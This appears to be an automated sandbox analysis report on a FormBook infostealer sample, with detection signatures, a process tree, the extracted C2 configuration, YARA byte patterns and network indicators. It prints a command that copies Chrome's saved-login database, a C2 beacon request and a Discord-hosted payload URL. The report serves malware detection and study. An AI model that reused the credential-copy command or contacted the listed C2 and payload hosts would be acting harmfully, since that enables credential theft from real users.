Loading ...

Play interactive tourEdit tour

Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Sample Name:f97e137e_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:403818
MD5:f97e137e249bb393fd88b7dec1ddf9a2
SHA1:09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256:2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • f97e137e_by_Libranalysis.exe (PID: 6944 cmdline: 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe' MD5: F97E137E249BB393FD88B7DEC1DDF9A2)
    • secinit.exe (PID: 4112 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5544 cmdline: /c del 'C:\Windows\SysWOW64\secinit.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vp21b7dsh.exe (PID: 2188 cmdline: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe MD5: 174A363BB5A2D88B224546C15DD10906)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.secinit.exe.10410000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.secinit.exe.10410000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.secinit.exe.10410000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17649:$sqlite3step: 68 34 1C 7B E1
        • 0x1775c:$sqlite3step: 68 34 1C 7B E1
        • 0x17678:$sqlite3text: 68 38 2A 90 C5
        • 0x1779d:$sqlite3text: 68 38 2A 90 C5
        • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.secinit.exe.10410000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.secinit.exe.10410000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: System File Execution Location AnomalyShow sources
          Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\secinit.exe, ParentImage: C:\Windows\SysWOW64\secinit.exe, ParentProcessId: 4112, ProcessCommandLine: , ProcessId: 3424

          Stealing of Sensitive Information:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\ipconfig.exe, ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 1904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: f97e137e_by_Libranalysis.exeAvira: detected
          Found malware configurationShow sources
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.joomlas123.infoVirustotal: Detection: 10%Perma Link
          Source: www.joomlas123.info/3nop/Virustotal: Detection: 13%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: f97e137e_by_Libranalysis.exeVirustotal: Detection: 26%Perma Link
          Source: f97e137e_by_Libranalysis.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: 2.2.secinit.exe.10410000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: f97e137e_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
          Source: Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then pop ebx2_2_10417AD0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then pop edi2_2_1041E58F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx10_2_00157AD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi10_2_00166D61
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi10_2_0015E58F

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.joomlas123.info/3nop/
          Source: global trafficHTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1Host: www.joomlas123.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.192.24.139 199.192.24.139
          Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1Host: www.joomlas123.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 10:34:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
